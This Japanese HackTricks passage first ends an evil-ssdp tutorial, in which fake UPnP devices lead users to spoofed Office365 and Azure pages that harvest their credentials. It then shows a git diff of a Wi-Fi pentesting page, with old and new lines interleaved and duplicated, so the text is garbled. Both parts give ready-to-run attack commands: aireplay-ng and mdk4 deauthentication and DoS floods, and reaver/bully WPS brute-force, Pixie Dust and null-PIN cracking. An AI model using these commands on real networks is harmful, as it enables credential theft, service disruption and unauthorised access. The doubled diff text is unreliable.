## **Office365 SSDPのスプーフィング**
前の実践では、スキャナーをターゲットユーザーにスプーフィングしました。次に、テンプレートディレクトリを通じて進行し、Office365のテンプレートを見つけました。それを使用しましょう。
### **テンプレートの設定**
前と同様に、テンプレートとツールの設定から始めましょう。python3を使用してツールを実行し、その後にpythonファイルの名前を指定します。次に、ネットワークインターフェースを指定し、その後にoffice365のテンプレートパラメータを指定します。
```bash
python3 evil-ssdp.py eth0 --template office365
```
![](https://i1.wp.com/1.bp.blogspot.com/-8GWxmKPDkIo/Xkq5RmgF8\_I/AAAAAAAAis0/bxVTcd4aBCUZBEDuUIg3-G39aMu7l5YCgCLcBGAsYHQ/s1600/6.png?w=687\&ssl=1)
ツールがその役割を果たし、攻撃者のマシンのポート8888に複数のテンプレートファイルをホストしていることがわかります。
### **ユーザーの操作**
ツールを実行すると、Office365バックアップという名前のUPnPデバイスが表示されます。これは、ツールがターゲットユーザーにファイルやペイロード、その他のタイプのインタラクションを送信することなく行われました。残るは、ユーザーがアイコンをクリックするだけです。
![](https://i0.wp.com/1.bp.blogspot.com/-txqBOw02D6w/Xkq5RgolUcI/AAAAAAAAis4/wkQTzYBmtdU\_Nbq9X1qI47FlJtdqHvIjQCLcBGAsYHQ/s1600/7.png?w=687\&ssl=1)
ユーザーがクリックすると、ターゲットユーザーはデフォルトのブラウザを介して偽のテンプレートページにリダイレクトされます。これは非常に本物のようなMicrosoftのウェブページです。無知なユーザーはこのページに有効な資格情報を入力します。
![](https://i1.wp.com/1.bp.blogspot.com/-69Tf3PRpvhM/Xkq5RziDXzI/AAAAAAAAis8/vjejKgh0XigRHFC2Ib8QCpPlzx\_RAu4eACLcBGAsYHQ/s1600/8.png?w=687\&ssl=1)
### **資格情報の取得**
ユーザーが資格情報を入力し、それがポストリクエストとしてサーバー(私たちのターゲットマシン)に渡されると、私たちのターミナルに資格情報が表示されます。
![](https://i0.wp.com/1.bp.blogspot.com/-3KXN6DKT\_E0/Xkq5SEwhKHI/AAAAAAAAitA/a2gTi5UwNE0JsMH-XQEW33MchkxgjPGSwCLcBGAsYHQ/s1600/9.png?w=687\&ssl=1)
## **ユーザーをパスワードボールトSSDPに誘導する**
これまでに、ターゲットユーザーをスキャナーの資格情報とOffice365のバックアップの資格情報を入手するためにスプーフィングしました。しかし、今度は最も重要なものであるUPnPとして使用されるパスワードボールトに取り組みます。
### **テンプレートの設定**
前回の実践と同様に、パスワードボールトのテンプレートを設定する必要があります。ツールはすぐにパスワードボールトのテンプレートをポート8888にホストします。
```bash
python3 evil-ssdp.py eth0 --template password-vault
```
![](https://i2.wp.com/1.bp.blogspot.com/-YPQirClmWN4/Xkq5O5WFgoI/AAAAAAAAisI/4\_i4ogVRWE0C\_ez3p6EkL8YdJ0ot48DmwCLcBGAsYHQ/s1600/10.png?w=687\&ssl=1)
### **ユーザーの操作**
ターゲットマシンに移動すると、エクスプローラーでPassword Vault UPnPが表示されていることがわかります。ユーザーがデバイスをクリックし、私たちの攻撃に引っかかることを期待します。Password Vaultのようなものを見ると、ユーザーはアイコンをクリックしたくなるでしょう。
![](https://i2.wp.com/1.bp.blogspot.com/-3oMPYaCZ46k/Xkq5PB4zQ\_I/AAAAAAAAisM/i5C8qZVB8RYWBwAkiKCZbdptIbsnk4CUwCLcBGAsYHQ/s1600/11.png?w=687\&ssl=1)
無知なユーザーは、偽のキーとパスワードで非常に重要な作業を達成したと思っています。これはユーザーを惑わすためのものであり、ユーザーはこの網羅的な資格情報のリストを試しても成功しないでしょう。
![](https://i0.wp.com/1.bp.blogspot.com/-SrCMlWIUxCM/Xkq5Pg\_IznI/AAAAAAAAisU/L\_ZIvQKfltkyk9iUCrEGyXCojx5b86uFgCLcBGAsYHQ/s1600/12.png?w=687\&ssl=1)
## **Microsoft Azure SSDPのスプーフィング**
スプーフィングを行う際に最も重要なタスクの1つは、ターゲットユーザーにスプーフィングの被害者であることを知らせないことです。これは、攻撃者が取得したい資格情報やクッキーなどを取得した後、ユーザーをリダイレクトすることで実現できます。evil\_ssdpツールには、攻撃者が選択した任意のURLに対してターゲットユーザーをリダイレクトするためのパラメータ-uがあります。このパラメータの動作を見てみましょう。
まず、ツールをロードするためにpython3を使用します。次に使用するネットワークインターフェースを指定します。この実践では、Microsoft Azure Storageテンプレートを使用します。テンプレートを選択した後、-uパラメータを入力し、ユーザーをリダイレクトしたい任意のURLを指定します。ここでは、Microsoftの公式リンクを使用していますが、これは任意の悪意のあるサイトにすることができます。
```bash
python3 evil-ssdp.py eth0 --template microsoft-azure -u https://malicous-site.com
```
![](https://i2.wp.com/1.bp.blogspot.com/-ReHCqgFazX0/Xkq5QBiQ7jI/AAAAAAAAisY/_DFdnzBpSGY1iDP1YJxeVTHF3iS5PZnqwCLcBGAsYHQ/s1600/13.png?w=687&ssl=1)
### **ユーザーの操作**
ツールを起動した後、以下の画像に示すように、ターゲットマシンにUPnPデバイスが作成されます。攻撃が成功するためには、ターゲットがデバイスをクリックする必要があります。
![](https://i1.wp.com/1.bp.blogspot.com/-rROTfEGP3z8/Xkq5QBn46dI/AAAAAAAAisc/7RDv7fI3BPYt1XmrKVRKOEHurkGY1xeogCLcBGAsYHQ/s1600/14.png?w=687&ssl=1)
アイコンをクリックした後、ユーザーはMicrosoft公式ページにリダイレクトされます。これは攻撃者が望むものになります。
![](https://i2.wp.com/1.bp.blogspot.com/-gU36s2kyIbg/Xkq5QVRh61I/AAAAAAAAisg/hN3uVMTPh-suDiH5ID3-mWcQiNvDVYeJACLcBGAsYHQ/s1600/15.png?w=687&ssl=1)
これで、この素晴らしいスプーフィングツールの実践が終了しました。
Evil SSDPは、説得力のある偽のUPnPデバイスを効果的に作成し、ユーザーを本物のサービスとやり取りさせることで操作を行わせます。ユーザーは、本物の外観に騙され、資格情報などの機密情報を提供する可能性があります。このツールの柔軟性は、スキャナーやOffice365、パスワードボルトなどのサービスを模倣するさまざまなテンプレートに及び、ユーザーの信頼とネットワークの可視性を活用します。資格情報を取得した後、攻撃者は被害者を指定されたURLにリダイレクトし、欺瞞の信憑性を維持できます。
## **緩和策**
* UPnPデバイスを無効にする。
* ユーザーにフィッシング攻撃を防ぐための教育を行う。
* パスワードが平文で送信されることを監視する。
これらの脅威に対抗するための推奨される対策には、次のものがあります:
<details>
- 不要な場合はデバイスでUPnPを無効にする。
- フィッシングやネットワークセキュリティについてユーザーに教育する。
- 暗号化されていない機密データのネットワークトラフィックを監視する。
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に**参加**するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
要するに、UPnPは便利さとネットワークの流動性を提供しますが、潜在的な悪用の可能性も開いてしまいます。ネットワークの整合性を確保するためには、意識と積極的な防御が重要です。

421
generic-methodologies-and-resources/pentesting-wifi/README.md
View file

@ -2,15 +2,15 @@
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**で**ゼロからヒーローまでのAWSハッキング**を学びましょう</strong></summary>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
HackTricksをサポートする他の方法:
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手してください
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローしてください。
- **ハッキングトリックを共有するためにPRを送信して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに貢献してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksのグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**してください。
* **ハッキングトリックを共有するためにPRを送信して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに参加してください。
</details>
@ -19,15 +19,15 @@ HackTricksをサポートする他の方法
経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るために[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)サーバーに参加しましょう!
**ハッキングの洞察**\
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加しましょう
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加する
**リアルタイムハックニュース**\
リアルタイムのニュースと洞察を通じてハッキングの世界の速いペースについていきましょう
**リアルタイムハックニュース**\
リアルタイムのニュースと洞察を通じて、ハッキングの世界を追いかける
**最新のアナウンス**\
最新のバグバウンティの開始や重要なプラットフォームのアップデートについて最新情報を入手しましょう
**最新の発表**\
最新のバグバウンティの開始や重要なプラットフォームのアップデートについて知っておく
**[**Discord**](https://discord.com/invite/N3FrSbmwdy)に参加して、今日からトップハッカーと協力を始めましょう!
**[**Discord**](https://discord.com/invite/N3FrSbmwdy)に参加して、今日からトップハッカーと協力を始めましょう!**
## Wifi基本コマンド
```bash
@ -51,7 +51,7 @@ git clone https://github.com/s0lst1c3/eaphammer.git
```
### Airgeddon
Airgeddonは、無線ネットワークの監査、攻撃、テスト、およびセキュリティオプションを提供する多機能のスクリプトです。このツールは、さまざまな無線ネットワークセキュリティ攻撃を実行するための包括的な環境を提供します。
Airgeddonは、無線ネットワークの監査、攻撃、テスト、およびセキュリティオプションを提供する多機能ツールです。このツールは、WEP、WPA、WPS、WPA2などのさまざまな暗号化方式をサポートしており、様々な攻撃手法を使用して無線ネットワークの脆弱性をテストすることができます。
```bash
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
@ -86,65 +86,60 @@ sudo python setup.py install # Install any dependencies
- 可能なネットワークをスキャンし、被害者を選択できるようにする
- WEPの場合はWEP攻撃を実行する
- WPA-PSKの場合
- WPSの場合Pixieダスト攻撃とブルートフォース攻撃ブルートフォース攻撃には時間がかかる可能性があるため注意が必要です。ヌルPINやデータベース/生成されたPINは試みません。
- APからPMKIDをキャプチャしてクラックを試み
- APのクライアントをデオーセンティケートしてハンドシェイクをキャプチャしようとする
- WPSの場合Pixieダスト攻撃とブルートフォース攻撃ブルートフォース攻撃には時間がかかる可能性があるので注意。ヌルPINやデータベース/生成されたPINは試みません。
- APからPMKIDをキャプチャしてクラックしようとす
- APのクライアントを切断してハンドシェイクをキャプチャしようとする
- PMKIDまたはハンドシェイクがある場合、top5000のパスワードを使用してブルートフォース攻撃を試みる
## 攻撃の概要
- **DoS**
- サービス拒否
- デオーセンティケーション/切断 - すべてのクライアントまたは特定のESSID/クライアント)を切断
- ランダムな偽のAP - ネットワークを隠し、スキャナーをクラッシュさせる可能性がある
- APの過負荷 - APを停止しようとする通常はあまり役に立たない
- WIDS - IDSとの相互作用
- TKIP、EAPOL - 一部のAPをDoSするための特定の攻撃
- Deauthentication/disassociation -- すべての人を切断または特定のESSID/クライアント)
- ランダムな偽のAP -- ネットワークを隠し、スキャナーをクラッシュさせる可能性がある
- APの過負荷 -- APを停止しようとする通常はあまり役に立たない
- WIDS -- IDSとの相互作用
- TKIP、EAPOL -- 一部のAPをDoSするための特定の攻撃
- **クラッキング**
- **WEP**のクラック(複数のツールと方法)
- **WPA-PSK**
- **WPS** PIN "ブルートフォース"
- **WPA PMKID** ブルートフォース
- \[DoS +] **WPAハンドシェイク** キャプチャ + クラック
- **WPS**ピン「ブルートフォース」
- **WPA PMKID**ブルートフォース
- \[DoS +] **WPAハンドシェイク**キャプチャ + クラック
- **WPA-MGT**
- **ユーザーのキャプチャ**
- **ブルートフォース** 資格情報
- **ユーザーのキャプチャ**
- **ブルートフォース**資格情報
- **Evil Twin**DoSあり/なし)
- **オープン** Evil Twin \[+ DoS] - キャプティブポータルの資格情報をキャプチャしたりLAN攻撃を実行するのに役立つ
- **WPA-PSK** Evil Twin - パスワードを知っている場合にネットワーク攻撃に役立つ
- **WPA-MGT** - 企業の資格情報をキャプチャするのに役立つ
- **KARMA、MANA**、**Loud MANA**、**Known beacon**
- **+ オープン** - キャプティブポータルの資格情報をキャプチャしたりLAN攻撃を実行するのに役立つ
- **+ WPA** - WPAハンドシェイクをキャプチャするのに役立つ
- **オープン**Evil Twin \[+ DoS] -- キャプティブポータルの資格情報をキャプチャしたりLAN攻撃を実行するのに役立つ
- **WPA-PSK** Evil Twin -- パスワードを知っている場合にネットワーク攻撃に役立つ
- **WPA-MGT** -- 企業の資格情報をキャプチャするのに役立つ
- **KARMA, MANA**, **Loud MANA**, **Known beacon**
- **+ オープン** -- キャプティブポータルの資格情報をキャプチャしたりLAN攻撃を実行するのに役立つ
- **+ WPA** -- WPAハンドシェイクをキャプチャするのに役立つ
## DOS
### デオーセンティケーションパケット
### Deauthentication Packets
この種の攻撃が行われる最も一般的な方法は、**デオーセンティケーション**パケットを使用することです。これらはアクセスポイントからデバイスを切断する責任がある「管理」フレームの一種です。これらのパケットを偽造することが、いつでもネットワークからクライアントを強制的に切断できるため、[多くのWi-Fiネットワークをハッキング](https://null-byte.wonderhowto.com/how-to/wi-fi-hacking/)する鍵となります。これが行われることの容易さは、多少恐ろしいものであり、しばしばWPAハンドシェイクを収集する一環として行われます。
**ここからの説明**: [**こちら**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
この切断を一時的に利用してハンドシェイクを収集してクラックするだけでなく、これらのデオーセンティケーションを継続させることもできます。これにより、クライアントが接続しているネットワークからのように見えるデオーセンティケーションパケットがクライアントに送信されます。これらのフレームは暗号化されていないため、多くのプログラムが管理フレームを利用してこれらを偽造し、ネットワーク上の1つまたはすべてのデバイスに送信します。\
**ここからの説明** [**こちら**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**。**
**Deauthentication**攻撃は、Wi-Fiハッキングで一般的な方法であり、"管理"フレームを偽造してデバイスをネットワークから**強制的に切断**することを含みます。これらの暗号化されていないパケットは、クライアントを正規のネットワークから来たものと信じ込ませ、攻撃者がWPAハンドシェイクを収集してクラックするため、またはネットワーク接続を持続的に妨害するために使用されます。この単純さにもかかわらず、広く使用されており、ネットワークセキュリティに重要な影響を与えています。
**Aireplay-ngを使用したデオーセンティケーション**
**Aireplay-ngを使用したDeauthentication**
```
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
```
* \-0 は切断を意味します
* 1 は送信する切断の数です複数送信することもできます0 は連続して送信します
* \-a 00:14:6C:7E:40:80 はアクセスポイントのMACアドレスです
* \-c 00:0F:B5:34:30:30 は切断するクライアントのMACアドレスですこれを省略するとブロードキャスト切断が送信されます常に機能しない場合があります
* ath0 はインターフェース名です
* \-c 00:0F:B5:34:30:30 は切断するクライアントのMACアドレスですこれを省略するとブロードキャスト切断が送信されます常に機能するわけではありません
* ath0 はインターフェース名
### 切断パケット
切断パケットは、ノード(ラップトップや携帯電話などのデバイス)を近くのアクセスポイントから切断するために使用される管理フレームの別のタイプです。切断フレームと切断フレームの違いは、主に使用される方法です
**切断パケット**は、Wi-Fiネットワークで使用される管理フレームの一種であり、切断パケットは、デバイスラップトップやスマートフォンなどとアクセスポイントAPとの接続を切断するために使用されます。切断と切断の主な違いは、使用シナリオにあります。APは**不正なデバイスをネットワークから明示的に削除するために切断パケットを送信しますが、切断パケットは通常、APがシャットダウン、再起動、または移動中であり、それによりすべての接続されたードを切断する必要がある場合に送信されます**
不正なデバイスを切断するためにAPが切断パケットを送信してデバイスにネットワークから切断されたことを通知するのに対し、切断パケットは、APが電源を切ったり、再起動したり、エリアを離れるときにードを切断するために使用されます。
**[こちら](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)** からの説明。
**この攻撃は mdk4モード "d")によって実行できます:**
**この攻撃はmdk4モード "d")によって実行できます:**
```bash
# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
@ -155,7 +150,7 @@ mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
```
### **mdk4によるさらなるDOS攻撃**
**[こちら](https://en.kali.tools/?p=864)** **から。**
**[こちら](https://en.kali.tools/?p=864)**で。
**攻撃モードb: ビーコンフラッディング**
@ -169,7 +164,7 @@ mdk4 wlan0mon b -a -w nta -m
```
**攻撃モードa: 認証サービス拒否**
範囲内で見つかったすべてのAPに認証フレームを送信します。多くのクライアントがいると、いくつかのAPがフリーズしたりリセットされる可能性があります。
範囲内のすべてのアクセスポイントAPに認証フレームを送信すると、特に多数のクライアントが関与する場合、これらのAPを過負荷にさせることができます。この激しいトラフィックはシステムの不安定さを引き起こし、一部のAPがフリーズしたり、リセットされることさえあります。
```bash
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
@ -179,85 +174,82 @@ mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m
```
**攻撃モード p: SSID プロービングとブルートフォース**
AP をプローブし、応答を確認します。SSID が正しく非表示にされているかどうか、および AP が送信範囲内にあるかどうかを確認するのに便利です。単語リストを使用してまたは使用せずに、**非表示の SSID のブルートフォース** も可能です。
アクセスポイントAPのプロービングは、SSID が適切に公開されているかどうかをチェックし、AP の範囲を確認します。このテクニックは、単語リストを使用してまたは使用せずに**非表示のSSIDをブルートフォース**することで、隠されたネットワークを特定およびアクセスするのに役立ちます。
**攻撃モード m: Michael 対策の悪用**
**攻撃モード m: マイケル対策の悪用**
ランダムなパケットを送信したり、別の QoS キューに重複パケットを再注入して、**TKIP AP** で Michael 対策を誘発します。AP はその後、1分間シャットダウンされ、これにより効果的な **DoS** が発生します。
異なる QoS キューにランダムまたは重複パケットを送信すると、**TKIP AP** でマイケル対策がトリガーされ、AP が1分間シャットダウンします。この方法は、効果的な**DoS**(サービス拒否)攻撃戦術です。
```bash
# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]
```
**攻撃モード e: EAPOL 開始およびログオフパケットのインジェクション**
**攻撃モード e: EAPOL Start および Logoff パケットのインジェクション**
**EAPOL** 開始フレームを使って AP に洪水を起こし、**偽のセッション**で忙しくさせ、合法的なクライアントを処理できないようにします。または、**偽の** EAPOL **ログオフメッセージ**をインジェクトしてクライアントをログオフします。
アクセスポイントに **EAPOL Start フレーム** を大量に送信することで、**偽のセッション** を作成し、アクセスポイントを圧倒し、正規のクライアントをブロックします。代わりに、**偽の EAPOL Logoff メッセージ** をインジェクトすることでクライアントを強制的に切断し、いずれの方法もネットワークサービスを効果的に妨害します。
```bash
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]
```
**ATTACK MODE s: IEEE 802.11sメッシュネットワーク向けの攻撃**
メッシュネットワークにおけるリンク管理やルーティングに対するさまざまな攻撃。隣接ノードや経路を洪水にし、ブラックホールを作成してトラフィックを転送します!
メッシュネットワークにおけるリンク管理やルーティングに対するさまざまな攻撃。
**ATTACK MODE w: WIDS混乱**
クライアントを複数のWDSードや偽のローグAPにクロス接続することで侵入検知および防止システムを混乱させる/悪用する。
クライアントを複数のWDSードや偽のローグAPにクロス接続することで、侵入検知および防止システムを操作し、混乱を引き起こし、潜在的なシステム乱用を引き起こすことができる。
```bash
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]
```
**攻撃モード f: パケットファズナー**
複数のパケットソースと豊富な修飾子を備えたシンプルなパケットファズナー。注意して使用してください!
パケットファズナーは、さまざまなパケットソースとパケット操作のための包括的な修飾子セットを備えたものです。
### **Airggedon**
_**Airgeddon**_ は、前のコメントで提案された攻撃のほとんどを提供します
_**Airgeddon**_ は、前のコメントで提案された攻撃のほとんどを提供します:
![](<../../.gitbook/assets/image (126).png>)
## WPS
WPS は Wi-Fi Protected Setup の略です。これは、ルーターとワイヤレスデバイス間の接続をより速く簡単にすることを試みるワイヤレスネットワークセキュリティ標準です。**WPS は、**WPA** Personal または **WPA2** Personal セキュリティプロトコルで暗号化されたパスワードを使用するワイヤレスネットワークにのみ適用されます。WPS は、基本的なツールとスキルを持つハッカーによって簡単にクラックされる古い WEP セキュリティを使用しているワイヤレスネットワークでは機能しません。([こちら](https://www.digitalcitizen.life/simple-questions-what-wps-wi-fi-protected-setup)より)
WPSWi-Fi Protected Setupは、**WPA**または**WPA2** Personalで暗号化されたネットワークのセットアップ速度と簡単さを向上させるために、デバイスをルーターに接続するプロセスを簡素化します。WEPセキュリティでは効果がありません。WPSは、2つの半分で検証される8桁のPINを使用し、組み合わせの数が限られているため、総当たり攻撃に対して脆弱です11,000通りの可能性
WPS は、ユーザーがネットワークに接続するために 8 桁の PIN を使用しますが、最初に最初の 4 桁がチェックされ、正しい場合にのみ次の 4 桁がチェックされます。その後、最初の半分と次の半分をブルートフォースすることが可能です(わずか 11000 通り)。
### WPSブルートフォース
### WPS ブルートフォース
このアクションを実行するための主要なツールは2つあります: ReaverとBully。
このアクションを実行するための主要な 2 つのツールがあります: Reaver と Bully。
* **Reaver** は、WPSに対する堅牢で実用的な攻撃を行うよう設計されており、さまざまなアクセスポイントとWPSの実装に対してテストされています。
* **Bully** は、Cで書かれたWPSブルートフォース攻撃の**新しい実装**です。オリジナルのreaverコードよりもいくつかの利点があります: 依存関係が少ない、メモリとCPUのパフォーマンスが向上している、エンディアンの正しい処理、より堅牢なオプションのセット。
* **Reaver** は、WPS に対する堅牢で実用的な攻撃を行うよう設計されており、さまざまなアクセスポイントと WPS 実装に対してテストされています。
* **Bully** は、C で書かれた WPS ブルートフォース攻撃の新しい実装です。オリジナルの reaver コードに比べて、依存関係が少なく、メモリと CPU のパフォーマンスが向上し、エンディアンの処理が正しく行われ、より堅牢なオプションが用意されています。
この攻撃は、特にWPS PINの脆弱性を悪用しており、最初の4桁の露出と最後の桁のチェックサムとしての役割により、総当たり攻撃が容易になっています。ただし、攻撃を継続するためには、攻撃者のMACアドレスを**ブロック**するなどの総当たり攻撃に対する防御策が、攻撃を続行するために**MACアドレスのローテーション**を要求します。
この攻撃は、**8 桁の WPS PIN コードの脆弱性**を利用しています。この問題のため、プロトコルは PIN の最初の 4 桁に関する情報を開示し、**最後の**桁が**チェックサム**として機能するため、WPS AP のブルートフォースが容易になります。\
一部のデバイスには、繰り返し攻撃を試みる MAC アドレスを**ブロックする**通常の**ブルートフォース保護**が含まれている場合があります。その場合、この攻撃の複雑さが増加し、PIN をテストする間に MAC アドレスを**切り替える**必要があります。
WPS の有効なコードが見つかった場合、Bully と Reaver はそれを使用してネットワークを保護するために使用される WPA/WPA2 PSK を発見し、必要なときにいつでも接続できるようになります。
BullyやReaverなどのツールを使用してWPS PINを取得した後、攻撃者はWPA/WPA2 PSKを推測し、**持続的なネットワークアクセス**を確保できます。
```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
```
**スマートブルートフォース**
すべての可能なPINを試す代わりに、攻撃しているAPのために利用可能な**PINが発見されたかどうかを確認**製造元MACに依存し、**PINソフトウェアが生成したPIN**をチェックすべきです。
この洗練されたアプローチは、既知の脆弱性を利用してWPS PINをターゲットにします
- 既知のPINのデータベースは、特定の製造元のアクセスポイント用に作成されており、同じWPS PINが使用されていることが知られています。このデータベースにはMACアドレスの最初の3つのオクテットと、この製造元にとって非常に可能性の高い対応するPINのリストが含まれています。
- WPS PINを生成するためのいくつかのアルゴリズムがあります。たとえば、ComputePINとEasyBoxは、計算にアクセスポイントのMACアドレスを使用します。ただし、ArcadyanアルゴリズムではデバイスIDも必要です。
1. **事前に発見されたPIN**: 特定のメーカーが一貫してWPS PINを使用することが知られている既知のPINのデータベースを利用します。このデータベースはMACアドレスの最初の3つのオクテットをこれらのメーカーのための可能性のあるPINに関連付けます。
2. **PIN生成アルゴリズム**: ComputePINやEasyBoxなどのアルゴリズムを活用します。これらはAPのMACアドレスに基づいてWPS PINを計算します。ArcadyanアルゴリズムにはデバイスIDが追加され、PIN生成プロセスにレイヤーが追加されます。
### WPS Pixie Dust攻撃
Dominique Bongardは、一部のAPが**ノンス****E-S1**および**E-S2**として知られるを生成する弱い方法を発見しました。これらのンスが何であるかを特定できれば、APのWPS PINを簡単に見つけることができます。なぜなら、APはPINを知っていることを証明するためにハッシュでPINを提供しなければならず、クライアントが不正なAPに接続していないことを示すためです。これらのE-S1とE-S2は、基本的にWPS PINを含む「ロックボックスを開けるための鍵」です。詳細はこちら[https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\))
**Dominique Bongard** は、一部のアクセスポイントAPにおける秘密コードの作成に関する欠陥、つまり**ノンス****E-S1**および**E-S2**を発見しました。これらのンスが特定できれば、APのWPS PINをクラックすることが容易になります。APは、PINを証明し、偽のローグAPではないことを示すために特別なコードハッシュ内でPINを明らかにします。これらのンスは、基本的にWPS PINを保持する「セーフ」を開くための「鍵」です。詳細は[こちら](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\))で確認できます。
基本的に、一部の実装は、PINを2つの部分に分解して認証通信中にクライアントに送信する際にランダムなキーの使用に失敗したため、オフライン攻撃を使用して有効なPINをブルートフォースできます
```
簡単に言うと、問題は、一部のAPが接続プロセス中にPINを暗号化するための十分にランダムでないキーを使用していなかったことです。これにより、PINがネットワーク外から推測されやすくなりましたオフラインブルートフォース攻撃
```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
```
### Null Pin攻撃
### Null Pin attack
一部の実装がNull PINを接続許可している非常に奇妙でもある。ReaverはこれをテストできるBullyはできない
```
いくつかの設計が甘いシステムは、**Null PIN**空のまたは存在しないPINでもアクセスを許可してしまうことがあり、これはかなり珍しいことです。**Reaver**ツールは、**Bully**とは異なり、この脆弱性をテストすることができます
```bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
```
### Airgeddon
@ -266,49 +258,54 @@ reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
![](<../../.gitbook/assets/image (124).png>)
* 5と6は、**独自のPIN**(あれば)を試すことができます
* 5と6は、**カスタムPIN**(あれば)を試すことができます
* 7と8は**Pixie Dust攻撃**を実行します
* 13は**NULL PIN**をテストできます
* 11と12は、利用可能なデータベースから選択したAPに関連するPINを**再収集**し、ComputePIN、EasyBox、およびオプションでArcadyanおすすめ、なぜならを使用して可能な**PIN**を**生成**します
* 11と12は、選択したAPに関連するPINを利用可能なデータベースから**再収集**し、ComputePIN、EasyBox、およびオプションでArcadyanおすすめ、なぜならを使用して可能な**PIN**を生成します
* 9と10は**すべての可能なPIN**をテストします
## **WEP**
壊れて消えたので、それについては話しません。ただし、_**airgeddon**_ にはこの種の保護を攻撃するための「All-in-One」というWEPオプションがあります。他のツールも同様のオプションを提供しています。
今日では壊れて使われていない。_**airgeddon**_ には、この種の保護を攻撃するための"All-in-One"というWEPオプションがあります。他のツールも同様のオプションを提供しています。
![](<../../.gitbook/assets/image (125).png>)
***
